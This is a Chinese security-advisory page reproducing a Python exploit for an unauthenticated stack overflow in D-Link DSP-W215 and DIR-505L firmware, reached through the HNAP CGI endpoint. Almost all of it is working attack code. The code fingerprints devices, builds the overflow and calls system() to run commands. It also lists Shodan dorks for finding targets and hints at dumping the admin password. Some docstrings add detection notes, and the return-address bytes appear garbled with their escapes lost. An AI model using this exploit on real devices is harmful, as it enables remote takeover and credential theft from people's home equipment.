链接:http://secunia.com/advisories/58972/ *>测试方法: --------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负! Craig ()提供了如下测试方法: =================================================== #!/usr/bin/env python # Unauthenticated stack overflow exploit that affects multiple D-Link products: # # o D-Link DSP-W215 hardware v1, firmware v1.00 # o D-Link DIR-505L hardware v1/2, firmware v1.06/1.07 # # Shodan Dorks: # # o lighttpd/1.4.28-devel-4618M # o lighttpd/1.4.28-devel-2866M # # The my_cgi.cgi CGI page responsible for handling HNAP requests reads # Content-Length bytes into a fixed-size stack buffer. # # This exploit returns to .text to execute system() with a user-supplied # command string (hint: try "nvram get admin_user_pwd"). Output from the # command will be returned to the user. # # Craig Heffner # 2014-05-09 import sys import urllib2 class Device(object):
    def __init__(self, model, version, size, ra):
        """Describe one affected firmware build.

        model   -- model-name string matched against the HNAP response body
        version -- firmware-version string matched against the HNAP response body
        size    -- number of filler bytes sent ahead of the saved registers
                   (consumed by Vulnerability._build_exploit)
        ra      -- value placed over the saved return address
        """
        self.model = model
        self.version = version
        self.size = size
        self.ra = ra
        # Substrings searched for in the HNAP response. As rendered on this page
        # the closing tags are absent, so these behave as prefix matches.
        self.model_html = "<ModelName>%s" % self.model
        self.version_html = "<FirmwareVersion>%s" % self.version

    def match(self, html):
        """Return True when both fingerprint substrings occur in *html*."""
        return (self.model_html in html and self.version_html in html)


class Vulnerability(object):
    """Fingerprint a target over HNAP and send the overflow request.

    Defensive summary of what the code below does: every interaction is an
    unauthenticated HTTP request to <target>/HNAP1/. The fingerprint is a
    plain GET; the attack is a POST whose body is device.size bytes of filler
    (30000 or 1000000 in the table below) plus a short tail. An HNAP request
    with a body of that size is therefore the simplest detection signal, and
    an HNAP endpoint reachable from an untrusted network is the precondition.
    The Secunia advisory linked at the top of this page is presumably the
    reference for affected products and vendor status -- confirm there.
    """

    # Command the original author runs when execute() is called without one;
    # per the header comment on this page it reaches system() on the device.
    DEFAULT_COMMAND = "nvram show"

    # NOTE(review): as rendered on this page the fourth argument of each entry
    # (and the "x00" terminator in _build_exploit) is plain ASCII text; these
    # look like byte-escape sequences whose backslashes were lost in
    # extraction. Do not treat the values shown here as the original ones.
    VULNERABLE_DEVICES = [
        Device("DIR-505", "1.06", 30000, "x00x40x52x34"),
        Device("DIR-505", "1.07", 30000, "x00x40x5Cx5C"),
        Device("DSP-W215", "1.00", 1000000, "x00x40x5CxAC"),
    ]

    def __init__(self, target, verbose=True):
        """Bind to *target* (host[:port] or full URL) and build the HNAP URL.

        A scheme is prepended only when none is present; the resulting URL is
        echoed through _debug_message when *verbose* is true.
        """
        self.verbose = verbose
        self.target = target
        self.url = "%s/HNAP1/" % self.target
        if "://" not in self.url:
            self.url = "http://" + self.url
        self._debug_message("Exploit URL: %s" % self.url)

    def _debug_message(self, msg):
        """Print an informational line when verbose output is enabled."""
        if self.verbose:
            print "[+] %s" % msg

    def _debug_error(self, err):
        """Print an error line when verbose output is enabled."""
        if self.verbose:
            print "[-] %s" % err

    def _build_exploit(self, device, command):
        """Assemble the POST body for *device* carrying *command*.

        Layout, as described by the original author's comments: device.size
        filler bytes, five saved registers, the saved return address, 0x28
        bytes of stack filler, the command string and a terminator. The body
        is therefore device.size + 20 + 4 + 0x28 + len(command) + 1 bytes
        long -- a size that stands out on an HNAP endpoint.
        """
        buf = "D" * device.size  # fills the fixed-size stack buffer
        buf += "B" * 4  # $s0, don't care
        buf += "B" * 4  # $s1, don't care
        buf += "B" * 4  # $s2, don't care
        buf += "B" * 4  # $s3, don't care
        buf += "B" * 4  # $s4, don't care
        buf += device.ra  # saved $ra
        buf += "C" * 0x28  # stack filler
        buf += command  # command string
        buf += "x00"  # terminator (see NOTE on VULNERABLE_DEVICES)
        return buf

    def _request(self, data=None):
        """Send one request to self.url and return the response body.

        With *data* None urllib2 issues a GET, otherwise a POST. The *data*
        parameter is rebound to the response body. Only urllib2.HTTPError is
        handled (an empty string is returned; a 500 is reported as a probable
        CGI crash); urllib2.URLError and socket errors propagate to the
        caller, and urlopen is called without a timeout.
        """
        req = urllib2.Request(self.url, data)
        try:
            data = urllib2.urlopen(req).read()
        except urllib2.HTTPError as e:
            data = ""
            if e.code == 500:
                self._debug_message("CGI page crashed with no output (this may or may not be a good thing)!")
            else:
                self._debug_error("Unexpected response: %s" % (str(e)))
        return data

    def fingerprint(self):
        """Identify the target from an unauthenticated GET to /HNAP1/.

        Returns the first entry of VULNERABLE_DEVICES whose model and version
        substrings occur in the response body, or None when nothing matches.
        The disclosure of model and firmware version without authentication
        is itself the observable a defender can look for.
        """
        hnap_info = self._request()
        for device in self.VULNERABLE_DEVICES:
            if device.match(hnap_info):
                self._debug_message("Identified target as %s v%s" % (device.model, device.version))
                return device
        self._debug_error("Could not identify target!")
        return None

    def execute(self, device, command=DEFAULT_COMMAND):
        """POST the overflow body for *device* and return the response body.

        Returns whatever _request returns: the response text, or "" when the
        server answered with an HTTP error.
        """
        self._debug_message("Executing exploit [%s] against %s [%s v%s]" % (command, self.target, device.model, device.version))
        return self._request(self._build_exploit(device, command))